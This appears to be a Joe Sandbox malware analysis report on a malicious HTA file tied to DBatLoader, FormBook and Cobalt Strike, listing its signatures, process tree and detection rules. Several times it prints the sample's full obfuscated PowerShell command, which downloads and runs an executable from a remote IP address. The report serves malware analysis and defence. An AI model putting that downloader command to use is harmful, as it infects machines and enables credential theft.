Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
truelifewithmanmadethingsonherefor.hta

Overview

General Information

Sample name:truelifewithmanmadethingsonherefor.hta
Analysis ID:1664909
MD5:4bacf388eda7f9e173282b1577c99b3d
SHA1:77dd004cd59ba53b9c44716b823a1c39ee293f95
SHA256:904129faa57fc614cefc17655f9cb0fba9392d271dfe9a1b9c18c28829c0e664
Tags:192-3-26-143htauser-skocherhan
Infos:

Detection

Cobalt Strike, DBatLoader, FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Detected Cobalt Strike Beacon
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected FormBook
Yara detected Powershell decode and execute
Allocates many large memory junks
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates a thread in another existing process (thread injection)
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Use Short Name Path in Command Line
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 5504 cmdline: mshta.exe "C:\Users\user\Desktop\truelifewithmanmadethingsonherefor.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 6388 cmdline: "C:\Windows\system32\cmd.exe" "/C poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6600 cmdline: poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 6892 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 6888 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDFBA.tmp" "c:\Users\user\AppData\Local\Temp\4jbortuo\CSC8F941E4524844CFB0E06A557A70D099.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • hkcmd.exe (PID: 6972 cmdline: "C:\Users\user\AppData\Roaming\hkcmd.exe" MD5: 05EF4CA659965C1D3FAA58077B0F9943)
          • cmd.exe (PID: 7008 cmdline: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\1925.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4940 cmdline: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\34695.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • colorcpl.exe (PID: 7004 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
            • jy7dhEfPtuBr.exe (PID: 6016 cmdline: "C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\heeigF7lwUb.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
              • systeminfo.exe (PID: 6940 cmdline: "C:\Windows\SysWOW64\systeminfo.exe" MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
                • firefox.exe (PID: 5236 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • svchost.exe (PID: 7000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.980236899.00000000020F6000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    0000000E.00000002.2110369857.0000000004BD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000E.00000002.2107211375.0000000002D40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000E.00000002.2110518882.0000000004C20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000B.00000002.1202792315.0000000005460000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.hkcmd.exe.20f6178.0.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
              6.2.hkcmd.exe.2f30000.3.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                6.2.hkcmd.exe.20f6178.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi32_6600.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\hkcmd.exe, ProcessId: 6972, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                    Sigma detected: Suspicious MSHTA Child Process
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICA
                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6600, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.cmdline", ProcessId: 6892, ProcessName: csc.exe
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6600, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\hkcmd[1].exe
                    Sigma detected: Use Short Name Path in Command Line
                    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDFBA.tmp" "c:\Users\user\AppData\Local\Temp\4jbortuo\CSC8F941E4524844CFB0E06A557A70D099.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDFBA.tmp" "c:\Users\user\AppData\Local\Temp\4jbortuo\CSC8F941E4524844CFB0E06A557A70D099.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentProcessId: 6892, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDFBA.tmp" "c:\Users\user\AppData\Local\Temp\4jbortuo\CSC8F941E4524844CFB0E06A557A70D099.TMP", ProcessId: 6888, ProcessName: cvtres.exe
                    Sigma detected: Dynamic CSharp Compile Artefact
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6600, TargetFilename: C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.cmdline
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))", CommandLine: poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICA
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7000, ProcessName: svchost.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Dot net compiler compiles file from suspicious location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; 